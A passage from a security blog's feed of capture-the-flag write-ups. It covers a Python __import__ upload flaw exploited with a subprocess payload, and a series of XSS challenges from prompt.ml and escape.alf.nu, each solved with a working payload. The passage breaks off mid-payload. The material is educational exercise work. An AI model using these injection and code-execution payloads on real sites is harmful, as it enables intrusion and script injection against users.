class="bp">False</span> <span class="k">def</span> <span class="nf">h</span><span class="p">(</span><span class="n">s</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">md5</span> <span class="k">return</span> <span class="n">md5</span><span class="p">(</span><span class="n">s</span><span class="p">).</span><span class="n">hexdigest</span><span class="p">()</span> <span class="k">def</span> <span class="nf">q</span><span class="p">(</span><span class="n">s</span><span class="p">):</span> <span class="kn">from</span> <span class="nn">urllib</span> <span class="kn">import</span> <span class="n">quote</span> <span class="k">return</span> <span class="n">quote</span><span class="p">(</span><span class="n">s</span><span class="p">)</span> <span class="k">def</span> <span class="nf">genpw</span><span class="p">():</span> <span class="kn">import</span> <span class="nn">random</span><span class="p">,</span> <span class="n">string</span> <span class="k">return</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">printable</span><span class="p">[:</span><span class="mi">62</span><span class="p">])</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mh">0x10</span><span class="p">)])</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">app</span><span class="p">.</span><span class="n">run</span><span class="p">()</span></code></pre></figure> <p>There are several interesting things to note here:</p> <p>1) You can see an <code class="language-plaintext highlighter-rouge">__import__()</code> call whose input is basically the MD5 hash of our username. If there were no hashing, this is a direct code execution if we can control the username but thats not the case here.</p> <p>2) There is a file named <code class="language-plaintext highlighter-rouge">userhash.py</code>, where userhash is the <code class="language-plaintext highlighter-rouge">MD5(username)</code> which is where user informations is saved (or I guess that’s where it is stored).</p> <p>3) There is a directory named <code class="language-plaintext highlighter-rouge">userhash/</code> where userhash is again the <code class="language-plaintext highlighter-rouge">MD5(username)</code> where the uploaded files of each user is saved.</p> <p>4) We can upload any kinds of files to the server where filename can be controlled by us or server saves the files inside the <code class="language-plaintext highlighter-rouge">userhash/</code> directory with the exam name with which we upload it (There are some client side protections but can easily be bypassed using burp). Interesting !</p> <h2 id="solution">Solution</h2> <p>Now it is obvious on how to exploit the scenario but that was not the case when I was solving it. If you look at the way how <code class="language-plaintext highlighter-rouge">__import__()</code> works, you can see that it tries to import the <code class="language-plaintext highlighter-rouge">__init__.py</code> from the function which we imported. So how can we make use of this here ?</p> <p>1) Upload a file named <code class="language-plaintext highlighter-rouge">__init__.py</code> to the <code class="language-plaintext highlighter-rouge">userhash/</code> directory. So next time when the <code class="language-plaintext highlighter-rouge">config = __import__(h(session.get('username')))</code> is loaded, instead of <code class="language-plaintext highlighter-rouge">userhash.py</code>, the import will actually execute the init file we uploaded !</p> <p>2) <code class="language-plaintext highlighter-rouge">return render_template('albums.html', msg="Hello, {} !".format(session.get('username')), imgs=config.imgs)</code> tells us that the names of the images are taken from an array named <code class="language-plaintext highlighter-rouge">imgs[]</code> and is shown to the user when he logs in.</p> <p>3) So by uploading an <code class="language-plaintext highlighter-rouge">__init__.py</code> we essentially control the config and inturn the <code class="language-plaintext highlighter-rouge">config.imgs</code>, so what if we can execute commands and save the output as image names ? Even through image doesn’t exist, the application still shows us the output this way.</p> <p>After messing around couple of times, here is the final <code class="language-plaintext highlighter-rouge">__init__.py</code> I uploaded to get the flag:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="n">x</span> <span class="o">=</span> <span class="nf">__import__</span><span class="p">(</span><span class="s2">"subprocess"</span><span class="p">)</span> <span class="n">imgs</span> <span class="o">=</span> <span class="p">[]</span> <span class="n">imgs</span><span class="mf">.</span><span class="nf">append</span><span class="p">(</span><span class="n">x</span><span class="mf">.</span><span class="nf">check_output</span><span class="p">(</span><span class="s1">'cat flag'</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="kc">True</span><span class="p">))</span></code></pre></figure> <h2 id="references">References</h2> <p>These are some of the awesome references which came in handy during solving this problem:</p> <ol> <li><a href="https://docs.python.org/3/library/functions.html#__import__">The import system - python 3.5.2 Documentation</a></li> </ol> Mon, 05 Sep 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/09/05/code-execution-python-import-mmactf-300/ https://blog.0daylabs.com/2016/09/05/code-execution-python-import-mmactf-300/ ctf Prompt.ml - XSS Challenges writeup <p>This is another great XSS challenge series inspired by <a href="https://blog.0daylabs.com/2016/06/17/escape-alf-nu-XSS-writeup-part-1/">alert(1)</a> but with a more greater difficulty. I have learned a lot solving these challenges and I strongly recommend you try solving the challenges yourself before reading the writeups here.</p> <h4 id="level-0">Level 0:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// warm up</span> <span class="c1">// script should be executed without user interaction</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;input type="text" value="</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">input</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">"&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Like always it starts with a simple warmup challenge without any filters. Just escape out of the attribute context and insert your own payload.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">"&gt;&lt;svg/onload="prompt(1)</code></p> <h4 id="level-1">Level 1:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// tags stripping mechanism from ExtJS library</span> <span class="c1">// Ext.util.Format.stripTags</span> <span class="kd">var</span> <span class="nx">stripTagsRE</span> <span class="o">=</span> <span class="sr">/&lt;</span><span class="se">\/?[^</span><span class="sr">&gt;</span><span class="se">]</span><span class="sr">+&gt;/gi</span><span class="p">;</span> <span class="nx">input</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="nx">stripTagsRE</span><span class="p">,</span> <span class="dl">''</span><span class="p">);</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;article&gt;</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">input</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">&lt;/article&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Now this is a modified version of the first one but with an included filter from an ExtJS library which strips the tags. The important thing to understand here is the REgex: <code class="language-plaintext highlighter-rouge">/&lt;\/?[^&gt;]+&gt;/gi;</code>. This REgex matches a string which starts with <code class="language-plaintext highlighter-rouge">&lt;</code>, which may or may not be followed by <code class="language-plaintext highlighter-rouge">/</code> (not necessarily), then can contain any characters other than <code class="language-plaintext highlighter-rouge">&gt;</code> and finally it should have a closing tag <code class="language-plaintext highlighter-rouge">&gt;</code>.</p> <p>So the point here is to note that the string matches the regex only if it contains a closing tag <code class="language-plaintext highlighter-rouge">&gt;</code>. Otherwise it won’t match and strip it. So the best thing to do is to inject a tag without the closing <code class="language-plaintext highlighter-rouge">&gt;</code> character (commented out the rest).</p> <p>Payload: <code class="language-plaintext highlighter-rouge">&lt;svg/onload=prompt(1)//</code></p> <h4 id="level-2">Level 2:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// v-- frowny face</span> <span class="nx">input</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">[</span><span class="sr">=(</span><span class="se">]</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">''</span><span class="p">);</span> <span class="c1">// ok seriously, disallows equal signs and open parenthesis</span> <span class="k">return</span> <span class="nx">input</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>This was a pretty good challenge where I learned a new concept. Here it filters <code class="language-plaintext highlighter-rouge">=(</code> which mean we cannot use either one of them. We can ofcourse inject tags but since prompt() function needs to use <code class="language-plaintext highlighter-rouge">(</code>, I wasted a lot of time thinking about how to bypass this (using encodings, backticks (in IE) etc..) but nothing works. But as always, <a href="https://twitter.com/0x6D6172696F">mario (0x6D6172696F)</a> really made my day when I saw his bypass payload (Its amazing to see the way he thinks ! I am a big fan of him :P).</p> <p>The solution here is that if we inject the script tags inside an <code class="language-plaintext highlighter-rouge">svg</code>, then we can use hex encoding or html encoding to bypass the filter because of the XML parsing property. The elements inside the <code class="language-plaintext highlighter-rouge">svg</code> is considered to be XML elements and XML parsing is carried out with it in which we can use <code class="language-plaintext highlighter-rouge">&amp;lpar;</code> or <code class="language-plaintext highlighter-rouge">&amp;#40</code> as an alternative to <code class="language-plaintext highlighter-rouge">(</code> and the parser will convert it into <code class="language-plaintext highlighter-rouge">(</code> at the time of execution.</p> <p>You can verify this by giving 2 differeny payloads. If we give <code class="language-plaintext highlighter-rouge">&lt;script&gt;prompt&amp;lpar;1)&lt;/script&gt;</code>, this will not fire the prompt(1) as its simply a script context where no explicit decoding is done by the javascript engine. But if we enclose it within an <code class="language-plaintext highlighter-rouge">svg</code> tag, you can see that it fires the payload, making us execute the prompt(1). Thanks <a href="https://twitter.com/0x6D6172696F">mario</a> !</p> <p>Payload: <code class="language-plaintext highlighter-rouge">&lt;svg&gt;&lt;script&gt;prompt&amp;lpar;1)&lt;/script&gt;</code></p> <h4 id="level-3">Level 3:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// filter potential comment end delimiters</span> <span class="nx">input</span> <span class="o">=</span> <span class="nx">input</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/-&gt;/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">_</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// comment the input to avoid script execution</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;!-- </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">input</span> <span class="o">+</span> <span class="dl">'</span><span class="s1"> --&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>This one was fairly easy. We can see that whatever userinput comes in, it goes inside the HTML comments so the only way to solve this is to escape out of comment context and inject our tags. But since <code class="language-plaintext highlighter-rouge">--&gt;</code> is filtered, I had no clue on how to solve this but luckly <code class="language-plaintext highlighter-rouge">--!&gt;</code> helped. This is when I understood that there are 2 ways to close a HTML comment.</p> <p>Payload: –!&gt;&lt;svg/onload=prompt(1)</p> <h4 id="level-4">Level 4:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="nx">Text</span> <span class="nx">Viewer</span> <span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">input</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// make sure the script belongs to own site</span> <span class="c1">// sample script: http://prompt.ml/js/test.js</span> <span class="k">if</span> <span class="p">(</span><span class="sr">/^</span><span class="se">(?:</span><span class="sr">https</span><span class="se">?</span><span class="sr">:</span><span class="se">)?\/\/</span><span class="sr">prompt</span><span class="se">\.</span><span class="sr">ml</span><span class="se">\/</span><span class="sr">/i</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nb">decodeURIComponent</span><span class="p">(</span><span class="nx">input</span><span class="p">)))</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">script</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">script</span><span class="dl">'</span><span class="p">);</span> <span class="nx">script</span><span class="p">.</span><span class="nx">src</span> <span class="o">=</span> <span class="nx">input</span><span class="p">;</span> <span class="k">return</span> <span class="nx">script</span><span class="p">.</span><span class="nx">outerHTML</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">Invalid resource.</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span></code></pre></figure> Sat, 18 Jun 2016 00:00:00 -0700 https://blog.0daylabs.com/2016/06/18/prompt-ml-XSS-challenge-writeup/ https://blog.0daylabs.com/2016/06/18/prompt-ml-XSS-challenge-writeup/ webchallenges xss escape.alf.nu - XSS Challenges writeup <p>There are 15 challenges overall. So lets discuss the writeups one by one.</p> <h4 id="level-0">Level 0:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Warmup.</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;script&gt;console.log("</span><span class="dl">'</span><span class="o">+</span><span class="nx">s</span><span class="o">+</span><span class="dl">'</span><span class="s1">");&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Well, this is very easy. There is no regex check, nor any filters so its very easy. Lets close the <code class="language-plaintext highlighter-rouge">console.log()</code> function first and then add our little <code class="language-plaintext highlighter-rouge">alert(1)</code> and balancing the quote afterwards.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">“);alert(1)(“</code></p> <h4 id="level-1">Level 1:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Escaping scheme courtesy of Adobe Systems, Inc.</span> <span class="nx">s</span> <span class="o">=</span> <span class="nx">s</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/"/g</span><span class="p">,</span> <span class="dl">'</span><span class="se">\\</span><span class="s1">"</span><span class="dl">'</span><span class="p">);</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;script&gt;console.log("</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">s</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">");&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>A small change from the above question where <code class="language-plaintext highlighter-rouge">" (quotes)</code> are filtered globally (see the /g in regex check) with a backslash. So the best way to bypass this is that we will give a backslash and then the quotes (which together renders like <code class="language-plaintext highlighter-rouge">\\"</code> ) so both the backslashes will cancel each other and we can execute alert(1).</p> <p>Payload: <code class="language-plaintext highlighter-rouge">\");alert(1)//</code></p> <h4 id="level-2">Level 2:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="nx">s</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">s</span><span class="p">);</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;script&gt;console.log(</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">s</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">);&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>If you read/play with <code class="language-plaintext highlighter-rouge">JSON.stringify()</code> more, you can see that it will escape double quotes. So we cannot inject it but an interesting thing is, it will not escape angle brackets. So the easiest way is close the script tag already opened and then start a new one with alert(1).</p> <p>Payload: <code class="language-plaintext highlighter-rouge">&lt;/script&gt;&lt;script&gt;alert(1)//</code></p> <h4 id="level-3">Level 3:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">url</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">javascript:console.log(</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">)</span><span class="dl">'</span><span class="p">;</span> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">url</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">a</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">a</span><span class="dl">'</span><span class="p">);</span> <span class="nx">a</span><span class="p">.</span><span class="nx">href</span> <span class="o">=</span> <span class="nx">url</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nx">a</span><span class="p">);</span> <span class="nx">a</span><span class="p">.</span><span class="nx">click</span><span class="p">();</span> <span class="p">}</span></code></pre></figure> <p>One quick thing you can notice with this challenge is that its on URL context. So the best way to bypass filters is to try URL encoding. Since double quotes (“) is filtered, we can bypass it by URL encoding the double quotes which is nothing but <code class="language-plaintext highlighter-rouge">%22</code>.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">%22);alert(1)//</code></p> <h4 id="level-4">Level 4:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="kd">var</span> <span class="nx">text</span> <span class="o">=</span> <span class="nx">s</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&amp;lt;</span><span class="dl">'</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="dl">'</span><span class="s1">"</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&amp;quot;</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// URLs</span> <span class="nx">text</span> <span class="o">=</span> <span class="nx">text</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">(</span><span class="sr">http:</span><span class="se">\/\/\S</span><span class="sr">+</span><span class="se">)</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&lt;a href="$1"&gt;$1&lt;/a&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// [[img123|Description]]</span> <span class="nx">text</span> <span class="o">=</span> <span class="nx">text</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\[\[(\w</span><span class="sr">+</span><span class="se">)\|(</span><span class="sr">.+</span><span class="se">?)\]\]</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&lt;img alt="$2" src="$1.gif"&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="k">return</span> <span class="nx">text</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>One quick thing to note here is that the developer has actually forgotten to globally remove double quotes (only the first instance is removed). We can make use of this. Also we can try exploiting the image alt features by creating an expected output by the REgex along with an event handler which triggers the XSS.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">[[a|""onload="alert(1)]]</code></p> <h4 id="level-5">Level 5:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Level 4 had a typo, thanks Alok.</span> <span class="c1">// If your solution for 4 still works here, you can go back and get more points on level 4 now.</span> <span class="kd">var</span> <span class="nx">text</span> <span class="o">=</span> <span class="nx">s</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&amp;lt;</span><span class="dl">'</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/"/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&amp;quot;</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// URLs</span> <span class="nx">text</span> <span class="o">=</span> <span class="nx">text</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">(</span><span class="sr">http:</span><span class="se">\/\/\S</span><span class="sr">+</span><span class="se">)</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&lt;a href="$1"&gt;$1&lt;/a&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// [[img123|Description]]</span> <span class="nx">text</span> <span class="o">=</span> <span class="nx">text</span><span class="p">.</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/</span><span class="se">\[\[(\w</span><span class="sr">+</span><span class="se">)\|(</span><span class="sr">.+</span><span class="se">?)\]\]</span><span class="sr">/g</span><span class="p">,</span> <span class="dl">'</span><span class="s1">&lt;img alt="$2" src="$1.gif"&gt;</span><span class="dl">'</span><span class="p">);</span> <span class="k">return</span> <span class="nx">text</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Well, things got interesting here as there is no way we can inject double quote here. So we need to make use of both img and href tag together in a way, one closes the other context and we can inject an event handler.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[[a|a]] -&gt; &lt;img alt="a" src="a.gif"&gt; [[a|b]] -&gt; &lt;img alt="b" src="a.gif"&gt; </code></pre></div></div> <p>ok, this means we can control what ever comes inside the <code class="language-plaintext highlighter-rouge">alt</code> tag. Lets see what happens if we inject <code class="language-plaintext highlighter-rouge">http://</code> there.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[[a|http://]] -&gt; &lt;img alt="&lt;a href="http://" src="a.gif"&gt;"&gt;http://]]&lt;/a&gt; </code></pre></div></div> <p>Now that looks cool. So now you can see that the <code class="language-plaintext highlighter-rouge">alt</code> context is escaped with the double quotes that comes with href which means we can try injecting our own event handler (since double quotes are filtered, we might want to try single quotes).</p> <p>Payload: <code class="language-plaintext highlighter-rouge">[[a|http://onload='alert(1)']]</code></p> <h4 id="level-6">Level 6:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Slightly too lazy to make two input fields.</span> <span class="c1">// Pass in something like "TextNode#foo"</span> <span class="kd">var</span> <span class="nx">m</span> <span class="o">=</span> <span class="nx">s</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="sr">/#/</span><span class="p">);</span> <span class="c1">// Only slightly contrived at this point.</span> <span class="kd">var</span> <span class="nx">a</span> <span class="o">=</span> <span class="nb">document</span><span class="p">.</span><span class="nx">createElement</span><span class="p">(</span><span class="dl">'</span><span class="s1">div</span><span class="dl">'</span><span class="p">);</span> <span class="nx">a</span><span class="p">.</span><span class="nx">appendChild</span><span class="p">(</span><span class="nb">document</span><span class="p">[</span><span class="dl">'</span><span class="s1">create</span><span class="dl">'</span><span class="o">+</span><span class="nx">m</span><span class="p">[</span><span class="mi">0</span><span class="p">]].</span><span class="nx">apply</span><span class="p">(</span><span class="nb">document</span><span class="p">,</span> <span class="nx">m</span><span class="p">.</span><span class="nx">slice</span><span class="p">(</span><span class="mi">1</span><span class="p">)));</span> <span class="k">return</span> <span class="nx">a</span><span class="p">.</span><span class="nx">innerHTML</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>This is one easy level where I got stuck for a long time. I used the browser console to try out so many functions that starts with “create” but it was too difficult to find out one which doesnot filter any characters. After so much of time, I looked into comments which is when I realized, this is so easy.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Comment#lol -&gt; &lt;!--lol--&gt; </code></pre></div></div> <p>Well, lets close the comment and then inject our string.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">Comment#--&gt;&lt;script&gt;alert(1)&lt;/script&gt;</code></p> <h4 id="level-7">Level 7:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Pass inn "callback#userdata"</span> <span class="kd">var</span> <span class="nx">thing</span> <span class="o">=</span> <span class="nx">s</span><span class="p">.</span><span class="nx">split</span><span class="p">(</span><span class="sr">/#/</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="sr">/^</span><span class="se">[</span><span class="sr">a-zA-Z</span><span class="se">\[\]</span><span class="sr">'</span><span class="se">]\*</span><span class="sr">$/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">thing</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">Invalid callback</span><span class="dl">'</span><span class="p">;</span> <span class="kd">var</span> <span class="nx">obj</span> <span class="o">=</span> <span class="p">{</span><span class="dl">'</span><span class="s1">userdata</span><span class="dl">'</span><span class="p">:</span> <span class="nx">thing</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="p">};</span> <span class="kd">var</span> <span class="nx">json</span> <span class="o">=</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">(</span><span class="nx">obj</span><span class="p">).</span><span class="nx">replace</span><span class="p">(</span><span class="sr">/&lt;/g</span><span class="p">,</span> <span class="dl">'</span><span class="se">\\</span><span class="s1">u003c</span><span class="dl">'</span><span class="p">);</span> <span class="k">return</span> <span class="dl">"</span><span class="s2">&lt;script&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">thing</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">(</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">json</span> <span class="o">+</span><span class="dl">"</span><span class="s2">)&lt;/script&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>An important thing to note here is that <code class="language-plaintext highlighter-rouge">callback</code> can contain single quotes <code class="language-plaintext highlighter-rouge">'</code> which can be of big help. Also we are already in the script context so the easiest thing to do is to put the entire thing inside single quotes so that it converts to a string and then inject our payload.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">'#';alert(1)//</code></p> <h4 id="level-8">Level 8:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Courtesy of Skandiabanken</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;script&gt;console.log("</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">s</span><span class="p">.</span><span class="nx">toUpperCase</span><span class="p">()</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">")&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Well, the first thing came to my mind is to use JSFuck as it can easily bypass the uppercase filter but its length is too high. Another best way to do it is to close the existing <code class="language-plaintext highlighter-rouge">script</code> tag and reopen a new one with an <code class="language-plaintext highlighter-rouge">src</code> attribute.</p> <p>Payload: <code class="language-plaintext highlighter-rouge">&lt;/script&gt;&lt;script src="site.com/1.js"&gt;</code></p> <h4 id="level-9">Level 9:</h4> <figure class="highlight"><pre><code class="language-javascript" data-lang="javascript"><span class="kd">function</span> <span class="nx">escape</span><span class="p">(</span><span class="nx">s</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// This is sort of a spoiler for the last level :-)</span> <span class="k">if</span> <span class="p">(</span><span class="sr">/</span><span class="se">[\\</span><span class="sr">&lt;&gt;</span><span class="se">]</span><span class="sr">/</span><span class="p">.</span><span class="nx">test</span><span class="p">(</span><span class="nx">s</span><span class="p">))</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">-</span><span class="dl">'</span><span class="p">;</span> <span class="k">return</span> <span class="dl">'</span><span class="s1">&lt;script&gt;console.log("</span><span class="dl">'</span> <span class="o">+</span> <span class="nx">s</span><span class="p">.</span><span class="nx">toUpperCase</span><span class="p">()</span> <span class="o">+</span> <span class="dl">'</span><span class="s1">")&lt;/script&gt;</span><span class="dl">'</span><span class="p">;</span> <span class="p">}</span></code></pre></figure> <p>Since angle brackets are closed here, there is no other way than to use <a href="www.jsfuck.com">JSFuck</a> (non-alphanumeric javascript).</p> <p>Payload: <code class="language-plaintext 